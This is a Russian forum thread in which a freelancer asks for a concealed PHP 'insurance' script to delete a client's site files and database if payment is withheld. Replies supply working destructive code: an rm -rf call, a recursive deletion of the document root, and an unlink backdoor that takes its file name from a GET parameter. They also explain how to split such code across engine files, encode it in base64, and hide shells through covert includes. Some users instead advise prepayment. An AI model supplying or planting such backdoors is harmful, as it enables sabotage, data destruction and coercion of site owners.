Файл (скрипт) - "страховка для фриласера"

Тема в разделе "Как сделать...", создана пользователем D'Jack, 6 фев 2014.

  1. D'Jack

    D'Jack

    Регистр.:
    22 сен 2012
    Сообщения:
    358
    Симпатии:
    133
    Добрый день!

    Один знакомый рассказывал, о том что опытные фрилансеры пользуются след. схемой подстраховки когда работают с незнакомым заказчиком и сомневаются в том, что их труд будет оплачен в оговоренных объёмах и сроках:

    Есть некий скриптик .php работа, которого заключается в том что бы удалить всё что находится на FTP сервере и какой то кусок sql базы, говоря другими словами если заказчик не заплатил удалённому исполнителю, предварительно поменяв все пароли которыми пользовался исполнитель в своей работе с сайтом, то фрилансер с любого компьютера заходит на сайт и запускает предварительно припрятаны им скриптик.

    www.название_сайта.ru/админка/произвольная_папка_1/произвольная_папка_2/скрипт_для_удаления_файлов.php

    Друзья, если у кого то есть пример скрипта буду очень признателен если поделитесь.
     
  2. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.211
    Симпатии:
    2.239
    Для этого обычно используются либо самописные скрипты, у каждого свои... Либо обычный вебшел.
    Делиться - в гугле полно готового. Да и нет 100% готового, ибо в БД всё равно лесть руками, да и пароли надо с разных конфигов по разному брать...
     
  3. demolg

    demolg

    Регистр.:
    13 авг 2007
    Сообщения:
    230
    Симпатии:
    76
    это обыкновенный phpшелл. подробнее: http://forum.antichat.net/thread246807.html
     
    D'Jack нравится это.
  4. D'Jack

    D'Jack

    Регистр.:
    22 сен 2012
    Сообщения:
    358
    Симпатии:
    133
    а если говорить исключительно об удалении файлов с ftp есть пример рабочий который можно взять на вооружение
     
  5. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.211
    Симпатии:
    2.239
    Код:
    <?php
    exec('rm -rf');
    ?>
    :D

    А так, говорю же, в гугле полно готового:
    PHP:
    <?php
    function removeDir($path) {
        if (
    is_file($path)) {
          @
    unlink($path);
        } else {
            
    array_map('removeDir',glob('/*')) == @rmdir($path);
        }
        @
    rmdir($path);
    }
    ?>
    $path = $_SERVER['DOCUMENT_ROOT'];
    removeDir($path);
    Осталось добавить проверку пароля и готово. Все файлы будут снесены. Причём не только внутри домена, но и выше - до корня юзера. Жестоко, зато 10 строк кода. Можно добавить другие пути, ограничения и т.д.

    Если надо удалить конкретный файл, да и в целях "мелкий пакостник" (Раз в сутки удаляем произвольный файлик:(
    PHP:
    <?php

    $file 
    $_GET['file'];
    unlink($file);

    ?>
    Пихаем в какой-нибудь системный файл, где в жизни не заметят и готово. Добавляем к домену ?file=/vae/www/domain/index.php и вуаля, файлика нет.

    Конечно, коды в таком виде никто не оставляет. Их распихивают по 20-30 файлам движка так, чтобы выглядели безобидными и нужными функциями... К примеру сам unlink пихается в менеджер файлов, где он вполне имеет место быть, а переменную, которая принимает удаляемый файл запихиваем ещё куда-нибудь. Данные передаём в каком-нибудь base64, но лучше в ещё более редких штуках... Ну это больше для параноиков. А как оплатил - удаляем все упоминания о себе и забываем о клиенте =)
     
    latteo, setevoi и D'Jack нравится это.
  6. Anton_Fadeev

    Anton_Fadeev Постоялец

    Регистр.:
    3 фев 2014
    Сообщения:
    50
    Симпатии:
    10
    Как-то доделывал интернет-магазин после предыдущего вебмастера. Причем он был хитрый - домен заказчика оформил на себя и хостинг тоже. Пароли скинул только ftp и mysql, т.е. зайти в админку хостинга и поменять все пароли я не мог. Как позже выяснилось - мой заказчик поругался с тем вебмастером. И первое время я за#@!ся удалять вирусы с сайта, которые, как я потом понял, заливал тот вебмастер. Не знаю кто кого кинул, но через год, когда сайт был раскручен и надо было продлевать домен - вебмастер запросил за него N-ную сумму денег, и заказчику пришлось заплатить.
    Я это к тому, что в основном страдал от этого не заказчик, а я, время от времени обнаруживая вредоносный код и кривоработающий сайт. Т.е. я тогда не знал как туда попадают вирусы и ночами сидел чистил все это чтобы заказчик не видел и не подумал что я ему сайт вирусами заразил. Меня тоже пытались кинуть и я тоже всячески подстраховывался. Но бывают и фрилансеры недобросовестные. Знаю пару случаев когда делали откровенную йухню, но оценивали свою работу так, будто им Папа Римский помогал. Когда ставят бесплатный движок, вешают на него бесплатный из паблика шаблон, ничего не настроив в движке и протянув резину 7 месяцев берут деньги как за уникальный сайт - по моему идет кидалово со стороны фрилансера. У меня знакомый на таких попал - я когда узнал, хотел просто в глаза посмотреть этим "программистам".
    Обычно я все регистрирую на заказчика (на новый почт. ящик) и потом передаю его заказчику, чтобы не парится с перерегистрацией и т.д. Потом подстраховываюсь оплатой - выполнил 30-50% - показал, получил деньги, приступил к оставшейся части. Нанести вред сайту можно и без доступа к файлам - например портить репутацию в сети и сужать трафик. Сам задумывался о лазейке - если кинули - грохнуть то что делал (можно с бекапом чтоб если одумаются можно было все вернуть), если все хорошо - чтобы скрипт сам себя удалил. А то такие шеллы, особенно из паблика очень опасны. Вам заплатили, все хорошо, а потом кто-нибудь случайно или из злого умысла воспользуется оставленными после вас дырами.

    А, вспомнил - хотел не просто грохнуть сайт, а чтобы появлялась табличка типа (если владелец сайта обманывает своих работников, то и клиентов он тоже кинет) или (сайт отключен за неоплату услуг фрилансера) =)
     
    Последнее редактирование: 22 фев 2014
  7. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.211
    Симпатии:
    2.239
    Ты за это деньги и получал... Ну а если ты за это не выставлял счёт - то это уже твоя вина, что делал что-то за пределами ТЗ.
    Обычный шелл заливай и всё.. Правь любой файлик, который хочешь...
     
  8. Anton_Fadeev

    Anton_Fadeev Постоялец

    Регистр.:
    3 фев 2014
    Сообщения:
    50
    Симпатии:
    10
    А вы пробовали доказать заказчику, что вирус попал туда не по вашей вине? Тем более если речь идет о недобросовестных заказчиках. Он скажет что мол, до того как ты взялся за работу все было ок, а ты что-то сделал и теперь на сайте вирусы.
     
  9. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.211
    Симпатии:
    2.239
    Пробовал и спокойно доказывал. Для этого есть логи FTP и HTTP серверов, к которым и ты, и заказчик имеете доступ только на чтение и удаление, но никак не на редактирование.

    Кроме того, надо изначально поставить заказчика на место - мы работает только по Вашему ТЗ, всё, что к нему не относится (уязвимости и прочее) мы не трогаем. При возникновении споров - сразу носом в логи ("я эти файлы не трогал, это уязвимость Вашего сайта").

    P.s. вечером под ДЛЕ выложу такую страховочку =)
     
    Последнее редактирование: 22 фев 2014
  10. Denixxx

    Denixxx

    Регистр.:
    7 фев 2014
    Сообщения:
    247
    Симпатии:
    196
    Вообще идея параноидальна по самой сути.
    Я работаю так.
    1. Предоплата.
    2. Изготовление сайта на своем домене.
    Проверяем, задаём вопросы.
    Не понравилось, или денег нет, или он кинуть хотел — разбежались, предоплата не возвращается.
    Или — идем к п. 3.
    3. Перечисляется остаток денег и скрипт отдается Заказчику.
    Либо он дает ФТП доступ, либо я даю файлик, автоматически устанавливающий сайт на его домен, либо ссылку на архив сайта — устанавливает сам (такой параноик один раз попался, из фирмы занимающейся безопасностью).

    Все остальное плохо работает. Шеллы — так он скорее из принципа найдет кого-то, кто их найдет скриптами, чем заплатит Вам то что должен.

    После того как перешел на такой принцип, за 3 года всего 2 раза не дошло до п. 3. Ещё — 30% Заказчиков отваливаются до предоплаты. По статистике, среди таких ранее было 80% кидал. Что интересно, когда работаешь совсем без предоплаты — со временем постоянные клиенты набираются наглости и начинаю потихоньку садиться на шею, даже до кидалова доходит.

    Так что совет: без предоплаты не работайте, вообще. Либо 100% бесплатно, если просто процесс интересен — но тогда это не работа, а хобби:)

    Предоплата — настоящая страховка для фрилансера!
    ;)

    Зы. А уж если занимаетесь шеллами — прячьте их в текстовые файлы в папке с конфигами, и делайте незаметный инклюд.
     
    Последнее редактирование: 22 фев 2014